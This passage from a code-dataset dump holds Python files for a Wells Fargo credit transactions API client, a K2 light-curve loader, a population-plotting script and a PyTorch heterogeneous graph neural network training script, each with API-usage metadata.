"bpy.props", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bpy.props.IntProperty", "line_number": 116, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 116, "usage_type": "attribute"}, {"api_name": "bpy.props.BoolProperty", "line_number": 122, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.logical_not", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 207, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.einsum", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 237, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 266, "usage_type": "call"}, {"api_name": "bpy.utils.register_class", "line_number": 297, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 297, "usage_type": "attribute"}, {"api_name": "bpy.types.VIEW3D_MT_object.append", "line_number": 298, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 298, "usage_type": "attribute"}, {"api_name": "bpy.utils.unregister_class", "line_number": 301, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 301, "usage_type": "attribute"}, {"api_name": "bpy.types.VIEW3D_MT_object.remove", "line_number": 302, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 302, "usage_type": "attribute"}, {"api_name": "cProfile.Profile", "line_number": 305, "usage_type": "call"}, {"api_name": "bpy.ops.object.vertex_colors_curve", "line_number": 307, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 307, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 309, "usage_type": "call"}, {"api_name": "pstats.Stats", "line_number": 311, "usage_type": "call"}]} +{"seq_id": "635934886", "text": "from ..core.constants import (\n TRANS_APPROVED,\n TRANS_TYPE_AUTH,\n TRANS_TYPE_CANCEL_AUTH,\n # TRANS_TYPE_CHARGE,\n # TRANS_TYPE_AUTH_AND_CHARGE,\n TRANS_TYPE_AUTH_AND_CHARGE_TIMEOUT_REVERSAL,\n TRANS_TYPE_RETURN_CREDIT,\n TRANS_TYPE_VOID_SALE,\n TRANS_TYPE_VOID_RETURN,\n)\nfrom wellsfargo.core.exceptions import TransactionDenied\nfrom ..models import APIMerchantNum, FinancingPlan, TransferMetadata\nfrom ..utils import as_decimal\nfrom .client import WFRSGatewayAPIClient\nimport uuid\n\n\nclass TransactionsAPIClient(WFRSGatewayAPIClient):\n def __init__(self, current_user=None):\n self.current_user = current_user\n\n def submit_transaction(self, trans_request, transaction_uuid=None, persist=True):\n api_path = self.get_api_path(trans_request)\n creds = APIMerchantNum.get_for_user(self.current_user)\n # Submit transaction to WFRS\n trans_request_data = {\n \"locale\": trans_request.locale,\n \"authorization_number\": trans_request.auth_number,\n \"account_number\": trans_request.account_number,\n \"plan_number\": str(trans_request.plan_number),\n \"amount\": str(trans_request.amount),\n \"ticket_number\": trans_request.ticket_number,\n \"merchant_number\": creds.merchant_num,\n }\n if transaction_uuid is None:\n transaction_uuid = uuid.uuid4()\n resp = self.api_post(\n api_path, client_request_id=transaction_uuid, json=trans_request_data\n )\n resp.raise_for_status()\n resp_data = resp.json()\n # Find the related plan\n plan_number = resp_data.get(\"plan_number\", trans_request.plan_number)\n plan, _ = FinancingPlan.objects.get_or_create(plan_number=plan_number)\n # Persist transaction data and WF specific metadata\n transfer = TransferMetadata()\n transfer.user = trans_request.user\n transfer.merchant_name = creds.name\n transfer.merchant_num = creds.merchant_num\n transfer.account_number = resp_data.get(\n \"account_number\", trans_request.account_number\n )\n transfer.merchant_reference = transaction_uuid\n transfer.amount = as_decimal(resp_data.get(\"amount\", trans_request.amount))\n transfer.type_code = trans_request.type_code\n transfer.ticket_number = resp_data.get(\n \"ticket_number\", trans_request.ticket_number\n )\n transfer.financing_plan = plan\n transfer.auth_number = resp_data.get(\n \"authorization_number\", trans_request.auth_number\n )\n transfer.status = resp_data[\"transaction_status\"]\n transfer.message = resp_data.get(\"status_message\", \"\")\n transfer.disclosure = resp_data.get(\"disclosure\", \"\")\n if persist:\n transfer.save()\n # Check for approval\n if transfer.status != TRANS_APPROVED:\n exc = TransactionDenied(\"%s: %s\" % (transfer.status, transfer.message))\n exc.status = transfer.status\n raise exc\n # Return the transfer metadata\n return transfer\n\n def get_api_path(self, trans_request):\n actions = {\n TRANS_TYPE_AUTH: \"authorization\",\n TRANS_TYPE_CANCEL_AUTH: \"cancel-authorization\",\n # TRANS_TYPE_CHARGE: 'charge',\n # TRANS_TYPE_AUTH_AND_CHARGE: 'authorization-charge',\n TRANS_TYPE_AUTH_AND_CHARGE_TIMEOUT_REVERSAL: \"timeout-authorization-charge\",\n TRANS_TYPE_RETURN_CREDIT: \"return\",\n TRANS_TYPE_VOID_SALE: \"void-sale\",\n TRANS_TYPE_VOID_RETURN: \"void-return\",\n }\n action = actions.get(trans_request.type_code)\n if action is None:\n raise ValueError(\"Unexpected transaction type: %s\" % action)\n api_path = \"/credit-cards/private-label/new-accounts/v2/payment/transactions/{action}\".format(\n action=action\n )\n return api_path\n", "sub_path": "src/wellsfargo/connector/transactions.py", "file_name": "transactions.py", "file_ext": "py", "file_size_in_byte": 3936, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "client.WFRSGatewayAPIClient", "line_number": 19, "usage_type": "name"}, {"api_name": "models.APIMerchantNum.get_for_user", "line_number": 25, "usage_type": "call"}, {"api_name": "models.APIMerchantNum", "line_number": 25, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 37, "usage_type": "call"}, {"api_name": "models.FinancingPlan.objects.get_or_create", "line_number": 45, "usage_type": "call"}, {"api_name": "models.FinancingPlan.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.FinancingPlan", "line_number": 45, "usage_type": "name"}, {"api_name": "models.TransferMetadata", "line_number": 47, "usage_type": "call"}, {"api_name": "utils.as_decimal", "line_number": 55, "usage_type": "call"}, {"api_name": "core.constants.TRANS_APPROVED", "line_number": 70, "usage_type": "name"}, {"api_name": "wellsfargo.core.exceptions.TransactionDenied", "line_number": 71, "usage_type": "call"}, {"api_name": "core.constants.TRANS_TYPE_AUTH", "line_number": 79, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_CANCEL_AUTH", "line_number": 80, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_AUTH_AND_CHARGE_TIMEOUT_REVERSAL", "line_number": 83, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_RETURN_CREDIT", "line_number": 84, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_VOID_SALE", "line_number": 85, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_VOID_RETURN", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "154005726", "text": "import lightkurve as lk\nfrom lightkurve.lightcurve import KeplerLightCurve\nimport os\nfrom typing import Union, List, Callable, Any\n\n\ndef getK2Ids() -> List[int]:\n \"\"\"Retrieves all the Ids\n \n :returns: A list containing all the certified K2 Ids.\n \"\"\"\n with open(\"data/k2_ids.txt\") as ids_file:\n ids = list(map(int, ids_file.readlines()))\n return ids\n\n\ndef getK2Id(index: int = 0) -> int:\n \"\"\"\n :param index: Literally the index you want from the K2 Ids List\n :returns: K2 Id as an Integer\n \"\"\"\n return getK2Ids()[index]\n\n\ndef retrieveK2LightCurve(k2Id: Union[int, str, float]) -> KeplerLightCurve:\n \"\"\"\n :param k2Id: The K2 Id, as an Integer, String or Float\n :returns: A KeplerLightCurve object\n \"\"\"\n k2Id = int(k2Id)\n search_result: lk.SearchResult = lk.search_lightcurve(f'EPIC {k2Id}', mission='K2')\n klc: KeplerLightCurve = search_result.download()\n klc.id = k2Id\n klc.filename = klc.meta[\"FILENAME\"]\n klc.delete = lambda self: os.remove(self.filename)\n return klc\n\n\ndef analyseK2LightCurve(k2Id: Union[int, str, float], func: Callable[[KeplerLightCurve], Any]) -> Any:\n \"\"\"\n :param k2Id: The K2 Id, as an Integer, String or Float\n :param func: The function to be ran, with the modified KeplerLightCurve as a parameter\n :return: Result of func\n \"\"\"\n klc = retrieveK2LightCurve(k2Id)\n result = func(klc)\n klc.delete()\n del klc\n return result\n\n\n__all__ = [\n \"retrieveK2LightCurve\", \"getK2Ids\", \"getK2Id\", \"analyseK2LightCurve\"\n]\n", "sub_path": "kepler/io/k2.py", "file_name": "k2.py", "file_ext": "py", "file_size_in_byte": 1537, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 25, "usage_type": "name"}, {"api_name": "lightkurve.SearchResult", "line_number": 31, "usage_type": "attribute"}, {"api_name": "lightkurve.search_lightcurve", "line_number": 31, "usage_type": "call"}, {"api_name": "lightkurve.lightcurve.KeplerLightCurve", "line_number": 32, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 35, "usage_type": "call"}, {"api_name": "lightkurve.lightcurve.KeplerLightCurve", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 39, "usage_type": "name"}, {"api_name": "lightkurve.lightcurve.KeplerLightCurve", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "432129457", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\ninfilename='/home/faiz/SS_2020/Ocean/exercies/03/output.txt'\noutfilename='/home/faiz/SS_2020/Ocean/exercies/03/output.png'\n\n#read labels from first line\nwith open(infilename) as f:\n dataLabels = f.readline().split(',')\n\n#clean labels (whitespace/tab/newline)\nfor s in dataLabels:\n s.lstrip().rstrip()\n\n#read data from row 2 onwoards\n#x[i,:] data i, i=0 is time,...\nx = np.loadtxt(infilename, delimiter=',', unpack=True,skiprows=1)\n\n#plot figure\nfig = plt.figure()\ndataLines=[]\nfor ii in range(1,x.shape[0]):\n lineIi, = plt.plot(x[0,:],x[ii,:], label=dataLabels[ii])\n dataLines.append(lineIi)\n\nplt.xlabel('time')\nplt.ylabel('populations')\nplt.legend(handles=dataLines, loc='best')\n#plt.show()\nfig.savefig(outfilename, bbox_inches='tight')\n\nfig.savefig(\"/home/faiz/SS_2020/Ocean/exercies/preditor-prey-best-example/pred-prey-chicken-fox.pdf\")", "sub_path": "exercies/03/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.loadtxt", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "1900919", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import KFold\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nimport torch.optim as optim\n\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\nclass Het_Node():\n def __init__(self, node_type, node_id, embed, neighbor_list_post = [], neighbor_list_user = [], label = None):\n self.node_type = node_type\n self.node_id = node_id\n self.emb = embed\n self.label = label #only post node, user node = default = None\n self.neighbors_user = neighbor_list_user #[(id)]\n self.neighbors_post = neighbor_list_post\n\ndef data_loader(pathway = 'F:/post_nodes/', node_type = \"post\"):\n if node_type == \"post\":\n post_node = []\n post_id = []\n post_label = []\n post_embed = []\n post_p_neigh = []\n post_u_neigh = []\n for i in range(19):\n print(i)\n batch = str(i)\n f = open(pathway + \"batch_\" + batch + '.txt')\n print(pathway + \"batch_\" + batch + '.txt')\n Lines = f.readlines() \n for j in range(len(Lines)):\n if j % 5 == 0:\n _, id_, label = Lines[j].split()\n post_id.append(int(id_))\n post_label.append(int(label))\n embed = []\n if j % 5 == 1 or j % 5 == 2:\n embed.append(list(map(float,Lines[j].split())))\n if j % 5 == 2:\n post_embed.append(embed)\n if j % 5 == 3:\n post_p_neigh.append(list(map(int,Lines[j].split())))\n if j % 5 == 4:\n post_u_neigh.append(list(map(int,Lines[j].split())))\n f.close()\n for i in range(len(post_id)):\n node = Het_Node(node_type = \"post\", node_id = post_id[i], embed = post_embed[i], neighbor_list_post = post_p_neigh[i], neighbor_list_user = post_u_neigh[i], label = post_label[i])\n post_node.append(node)\n return post_node\n \n else:\n user_node = []\n user_id = []\n user_embed = []\n f = open(pathway + 'user_nodes.txt')\n Lines = f.readlines() \n for j in range(len(Lines)):\n if j % 3 == 0:\n id_ = Lines[j].split()\n user_id.append(int(id_[0]))\n embed = []\n if j % 3 == 1 or j % 3 == 2:\n embed.append(list(map(float,Lines[j].split())))\n if j % 3 == 2:\n user_embed.append(embed)\n f.close()\n for i in range(len(user_id)):\n node = Het_Node(node_type = \"user\", node_id = user_id[i], embed = user_embed[i])\n user_node.append(node) \n return user_node\n\npost_nodes = data_loader(pathway='F:/FYP_data/normalized_post_nodes/', node_type=\"post\")\nuser_nodes = data_loader(pathway='F:/FYP_data/normalized_user_nodes/', node_type=\"user\")\npost_emb_dict = {}\nuser_emb_dict = {}\nfor user in user_nodes:\n user_emb_dict[user.node_id] = user.emb\nfor post in post_nodes:\n post_emb_dict[post.node_id] = post.emb\n\nclass Het_GNN(nn.Module):\n #features: list of HetNode class\n def __init__(self, input_dim, ini_hidden_dim, hidden_dim, batch_size,\n u_input_dim, u_hidden_dim, u_ini_hidden_dim, u_output_dim, u_num_layers,\n p_input_dim, p_hidden_dim, p_ini_hidden_dim, p_output_dim, p_num_layers,\n out_embed_d, outemb_d,\n u_batch_size = 1, p_batch_size = 1,content_dict={}, num_layers=1, u_rnn_type='LSTM', p_rnn_type='LSTM', rnn_type='LSTM', embed_d = 200):\n super(Het_GNN, self).__init__()\n self.input_dim = input_dim\n self.ini_hidden_dim = ini_hidden_dim\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.num_layers = num_layers\n self.embed_d = embed_d\n self.u_input_dim = u_input_dim\n self.u_hidden_dim = u_hidden_dim\n self.u_ini_hidden_dim = u_ini_hidden_dim\n self.u_batch_size = u_batch_size\n self.u_output_dim = u_output_dim\n self.u_num_layers = u_num_layers\n self.u_rnn_type = u_rnn_type\n self.p_input_dim = p_input_dim\n self.p_hidden_dim = p_hidden_dim\n self.p_ini_hidden_dim = p_ini_hidden_dim\n self.p_batch_size = p_batch_size\n self.p_output_dim = p_output_dim\n self.p_num_layers = p_num_layers\n self.p_rnn_type = p_rnn_type\n self.out_embed_d = out_embed_d\n self.outemb_d = outemb_d\n #self.features = features\n self.content_dict = content_dict\n self.p_neigh_att = nn.Parameter(torch.ones(embed_d * 2, 1), requires_grad=True)\n self.u_neigh_att = nn.Parameter(torch.ones(embed_d * 2, 1), requires_grad=True)\n # Define the initial linear hidden layer\n self.init_linear_text = nn.Linear(self.input_dim[0], self.ini_hidden_dim[0])\n self.init_linear_image = nn.Linear(self.input_dim[1], self.ini_hidden_dim[1])\n self.init_linear_other = nn.Linear(self.input_dim[2], self.ini_hidden_dim[2])\n # Define the LSTM layer\n self.lstm_text = eval('nn.' + rnn_type)(self.ini_hidden_dim[0], self.hidden_dim, self.num_layers, batch_first=True,\n bidirectional=True)\n self.lstm_image = eval('nn.' + rnn_type)(self.ini_hidden_dim[1], self.hidden_dim, self.num_layers, batch_first=True,\n bidirectional=True)\n self.lstm_other = eval('nn.' + rnn_type)(self.ini_hidden_dim[2], self.hidden_dim, self.num_layers, batch_first=True,\n bidirectional=True)\n # Define same_type_agg\n self.u_init_linear = nn.Linear(self.u_input_dim, self.u_ini_hidden_dim)\n self.u_lstm = eval('nn.' + self.u_rnn_type)(self.u_ini_hidden_dim, self.u_hidden_dim, self.u_num_layers,\n batch_first=True, bidirectional=True)\n self.u_linear = nn.Linear(self.u_hidden_dim * 2, self.u_output_dim)\n self.u_dropout = nn.Dropout(p=0.5)\n self.p_init_linear = nn.Linear(self.p_input_dim, self.p_ini_hidden_dim)\n self.p_lstm = eval('nn.' + self.p_rnn_type)(self.p_ini_hidden_dim, self.p_hidden_dim, self.p_num_layers,\n batch_first=True, bidirectional=True)\n self.p_linear = nn.Linear(self.p_hidden_dim * 2, self.p_output_dim)\n self.p_dropout = nn.Dropout(p=0.5)\n self.act = nn.LeakyReLU()\n self.softmax = nn.Softmax(dim=1)\n self.out_linear = nn.Linear(self.out_embed_d, self.outemb_d)\n self.output_act = nn.Sigmoid()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear) or isinstance(m, nn.Parameter):\n nn.init.xavier_normal_(m.weight.data)\n m.bias.data.fill_(0.1)\n\n def Bi_RNN(self, neighbor_id, node_type, post_emb_dict, user_emb_dict):\n # Forward pass through initial hidden layer\n input_a = []\n input_b = []\n new_id = []\n if node_type == \"post\":\n for i in neighbor_id:\n if (\"post\", i) not in self.content_dict:\n input_a.append(post_emb_dict[i][0])\n input_b.append(post_emb_dict[i][1])\n new_id.append(i)\n input_a = torch.Tensor(input_a)\n input_b = torch.Tensor(input_b)\n linear_input_text = self.init_linear_text(input_a)\n linear_input_image = self.init_linear_image(input_b)\n linear_input_text = linear_input_text.view(linear_input_text.shape[0],1,linear_input_text.shape[1])\n linear_input_image = linear_input_image.view(linear_input_image.shape[0],1,linear_input_image.shape[1])\n lstm_out_text, self.hidden_text = self.lstm_text(linear_input_text)\n lstm_out_image, self.hidden_image = self.lstm_image(linear_input_image)\n concate = torch.cat((lstm_out_text, lstm_out_image), 1)\n if node_type == \"user\":\n for i in neighbor_id:\n if (\"user\", i) not in self.content_dict:\n input_a.append(user_emb_dict[i][0])\n input_b.append(user_emb_dict[i][1])\n new_id.append(i)\n input_a = torch.Tensor(input_a)\n input_b = torch.Tensor(input_b)\n linear_input_text = self.init_linear_text(input_b)\n linear_input_other = self.init_linear_other(input_a)\n linear_input_text = linear_input_text.view(linear_input_text.shape[0], 1, linear_input_text.shape[1])\n linear_input_other = linear_input_other.view(linear_input_other.shape[0], 1, linear_input_other.shape[1])\n lstm_out_text, self.hidden_text = self.lstm_text(linear_input_text)\n lstm_out_other, self.hidden_other = self.lstm_other(linear_input_other)\n concate = torch.cat((lstm_out_text, lstm_out_other), 1)\n\n # mean pooling all the states\n mean_pooling = torch.mean(concate, 1)\n\n for i in neighbor_id:\n if (\"post\", i) in self.content_dict:\n mean_pooling = torch.cat(mean_pooling, self.content_dict[i], dim=0)\n for i in range(len(new_id)):\n self.content_dict[i] = mean_pooling[i]\n return mean_pooling\n\n #features: list of [(id)]\n def SameType_Agg_Bi_RNN(self, neighbor_id, node_type):\n content_embedings = self.Bi_RNN(neighbor_id, node_type, post_emb_dict, user_emb_dict)\n if node_type == 'post':\n linear_input = self.p_init_linear(content_embedings)\n linear_input = linear_input.view(linear_input.shape[0],1,linear_input.shape[1])\n lstm_out, hidden = self.p_lstm(linear_input)\n last_state = self.p_linear(lstm_out)\n last_state = self.p_dropout(last_state)\n mean_pooling = torch.mean(last_state, 0)\n return mean_pooling\n else:\n linear_input = self.u_init_linear(content_embedings)\n linear_input = linear_input.view(linear_input.shape[0], 1, linear_input.shape[1])\n lstm_out, hidden = self.u_lstm(linear_input)\n last_state = self.u_linear(lstm_out)\n last_state = self.u_dropout(last_state)\n mean_pooling = torch.mean(last_state, 0)\n return mean_pooling\n\n def node_het_agg(self, het_node): #heterogeneous neighbor aggregation\n\n #attention module\n c_agg_batch = self.Bi_RNN([het_node.node_id], het_node.node_type, post_emb_dict, user_emb_dict)\n u_agg_batch = self.SameType_Agg_Bi_RNN(het_node.neighbors_user, \"user\")\n p_agg_batch = self.SameType_Agg_Bi_RNN(het_node.neighbors_post, \"post\")\n\n c_agg_batch_2 = torch.cat((c_agg_batch, c_agg_batch), 1).view(len(c_agg_batch), self.embed_d * 2)\n u_agg_batch_2 = torch.cat((c_agg_batch, u_agg_batch), 1).view(len(c_agg_batch), self.embed_d * 2)\n p_agg_batch_2 = torch.cat((c_agg_batch, p_agg_batch), 1).view(len(c_agg_batch), self.embed_d * 2)\n\n #compute weights\n concate_embed = torch.cat((c_agg_batch_2, u_agg_batch_2, p_agg_batch_2), 1).view(len(c_agg_batch), 3, self.embed_d * 2)\n if het_node.node_type == \"user\":\n atten_w = self.act(torch.bmm(concate_embed, self.u_neigh_att.unsqueeze(0).expand(len(c_agg_batch),*self.u_neigh_att.size())))\n else:\n atten_w = self.act(torch.bmm(concate_embed, self.p_neigh_att.unsqueeze(0).expand(len(c_agg_batch),*self.p_neigh_att.size())))\n atten_w = self.softmax(atten_w).view(len(c_agg_batch), 1, 3)\n\n #weighted combination\n concate_embed = torch.cat((c_agg_batch, u_agg_batch, p_agg_batch), 1).view(len(c_agg_batch), 3, self.embed_d)\n weight_agg_batch = torch.bmm(atten_w, concate_embed).view(len(c_agg_batch), self.embed_d)\n\n return weight_agg_batch\n \n def output(self, c_embed_batch):\n\n batch_size = 1\n # make c_embed 3D tensor. Batch_size * 1 * embed_d\n c_embed = c_embed_batch.view(batch_size, 1, self.out_embed_d)\n c_embed_out = self.out_linear(c_embed)\n predictions = self.output_act(c_embed_out) #log(1/(1+exp(-x))) sigmoid = 1/(1+exp(-x))\n return predictions\n\n def forward(self, x):\n x = self.node_het_agg(het_node = x)\n x = self.output(c_embed_batch=x)\n return x\n\n\ndef BCELoss(predictions, true_label):\n loss = nn.BCELoss()\n predictions = predictions.view(1)\n tensor_label = torch.FloatTensor(np.array([true_label]))\n loss_sum = loss(predictions, tensor_label)\n return loss_sum\n\n\nnet = Het_GNN(input_dim = [300, 512, 12], ini_hidden_dim = [500, 500, 500], hidden_dim=100, batch_size=1, u_input_dim=200, u_hidden_dim=500, u_ini_hidden_dim=500,\n u_batch_size=1, u_output_dim=200, u_num_layers=1, u_rnn_type='LSTM', p_input_dim=200,\n p_hidden_dim=500, p_ini_hidden_dim=500, p_batch_size=1, p_output_dim=200, p_num_layers=1,\n p_rnn_type='LSTM',out_embed_d=200, outemb_d=1)\nnet.init_weights()\nprint(net)\noptimizer = optim.SGD(net.parameters(), lr=0.05)\nrunning_loss = 0.0\nval_loss = 0.0\ntest_loss = 0.0\nnum_epoch = 5\nprint('Start training')\n\n# Shuffle the order in post nodes\nnp.random.shuffle(post_nodes)\n\n# K-fold validation index\ntrain_index = []\nval_index = []\nkfold = KFold(10, True, 1)\nfor train, val in kfold.split(post_nodes[:4300]):\n train_index.append(train)\n val_index.append(val)\n\n# split test set first\ntest_set = post_nodes[4300:]\n\nfor epoch in range(num_epoch):\n print('Epoch:', epoch+1)\n c = 0.0\n running_loss = 0.0\n v = 0.0\n\n # generate train and test set for current epoch\n train_set = []\n val_set = []\n for t_index in train_index[epoch]:\n train_set.append(post_nodes[t_index])\n for v_index in val_index[epoch]:\n val_set.append(post_nodes[v_index])\n for i in range(len(train_set)):\n optimizer.zero_grad()\n output = net(train_set[i])\n if (output.item() >= 0.5 and train_set[i].label == 1) or (output.item() < 0.5 and train_set[i].label == 0):\n c += 1\n loss = BCELoss(predictions=output, true_label=train_set[i].label)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n if i % 100 == 99: # print every 100 mini-batches\n print('Epoch: %d, step: %5d, loss: %.4f, acc: %.4f'%\n (epoch + 1, i + 1, running_loss / 100, c/100))\n running_loss = 0.0\n c = 0.0\n for j in range(len(val_set)):\n output = net(val_set[j])\n if (output.item() >= 0.5 and val_set[j].label == 1) or (output.item() < 0.5 and val_set[j].label == 0):\n v += 1\n vloss = BCELoss(predictions=output, true_label=val_set[j].label)\n val_loss += vloss.item()\n print('Validation loss: %.4f, Validation accuracy: %.4f'% (val_loss/len(val_set), v/len(val_set)))\n v = 0.0\n val_loss = 0.0\nprint('Finish training')\n\nprint('==============================================================')\n\nprint('Start testing')\nt = 0.0\nfor k in range(len(test_set)):\n output = net(test_set[k])\n if (output.item() >= 0.5 and test_set[k].label == 1) or (output.item() < 0.5 and test_set[k].label == 0):\n t += 1\n tloss = BCELoss(predictions=output, true_label=test_set[k].label)\n test_loss += tloss.item()\n\nprint('Test loss: %.4f, Test accuracy: %.4f'% (test_loss/len(test_set), t/len(test_set)))\nprint('Finish testing')\n\n", "sub_path": "het_agg_modi.py", "file_name": "het_agg_modi.py", "file_ext": "py", "file_size_in_byte": 15721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.cuda.is_available", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 140, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 142, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 